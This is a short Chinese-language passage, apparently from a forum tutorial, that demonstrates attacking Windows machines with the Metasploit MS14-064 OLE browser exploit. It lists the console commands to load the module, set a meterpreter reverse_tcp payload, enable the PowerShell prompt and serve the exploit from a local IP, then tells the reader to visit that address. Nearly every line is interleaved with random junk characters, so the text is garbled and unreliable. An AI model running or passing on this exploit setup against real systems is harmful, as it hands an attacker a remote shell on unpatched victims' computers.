2 g4 _) x. G& S0 d 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示. d6 t" |% p3 ^; M+ [. i* a
) R# ?7 w% g/ W6 U& D' T$ V+ U
: x( g8 v! _! b3 d) W1 E 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
% ~% v8 {$ h, \) Z8 d; D- W4 M/ G
. b6 g- M' \- v) h. \
7 Y( }* i7 m" c9 n8 u. l+ p
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp, z; a. W; c" E/ R* N9 T
2 O5 ?6 r: V9 _& j& y2 j1 P9 ^0 z- L' g( C5 ~7 _
set AllowPowershellPrompt true
5 {7 J, ?4 W L' f; I, u. h
8 x2 ]' H2 m$ n1 v! k/ }# {7 S, h
3 C; W+ f ~2 t) j6 f Q Set LHOST 192.168.0.109
' ~, L! X2 B8 T
% i' S6 z" _: j8 ~ P( n# I7 l
' m2 _& V# O, ?7 O% ?# e
set SRVHOST 192.168.0.109* ^/ d- l3 u( E& e( \& H
4 s9 Q2 Z& j, J- x' U" L6 U2 s2 u
* f; _ U- c' \+ M2 j3 V Set uripath share9 v7 f, u( v" g
( h' Q1 I8 {% O6 [' Y8 X, V% O' K" _" n2 o2 l2 ?9 l
Set srvport 80
$ c" f$ \3 F: f u" ]; r
& @/ a t, f0 V! R1 c, P( L0 K; X2 G' K& c& e* W- C
" K. G( o. c: g. n
5 K, p+ U) A0 M. U2 O9 C {. \! h8 F# [8 M. T, V
- `* W" _5 R+ z: T+ H+ A
1 {/ a2 |5 ]1 V" D0 z3 W2 l
9 k3 l1 a9 z& f9 |# |
1 g$ L6 q1 l+ X1 h( R% U: D
8 ]0 ^$ D9 s4 r6 i
% F, t) o) @# m; t, C5 _0 m' i5 k5 X
" T' U0 Q5 t; H/ X0 Z6 Q
. Q* P o8 N0 n0 S7 } U
) E9 Z r0 n. I! _" R3 k
, ]; b$ W: w) w# R6 T- ]
* Q( \ ^# X% a9 f- ?! m& c
3 r4 @0 U4 T0 A! J8 |/ ]) q7 ? 下面我们来访问本地地址如图:% c* D4 G# M: w7 N# Q0 r; U
) n. E8 |+ T* i7 V: O9 E) f, t- y5 w- u7 }; n. C) f; ^1 Z4 y
* x& K$ x' b8 C3 C; x2 M4 j
6 v: f7 n& t% M3 D
. a M1 A' i8 A2 @8 D " R0 G: N3 ~# V* Z' y
0 j, V8 [! f3 m5 e
8 X4 c8 t/ k, s* j% u1 x) C3 T& R
6 H! m: B0 R1 E) U2 C: z" c# {0 i3 m$ s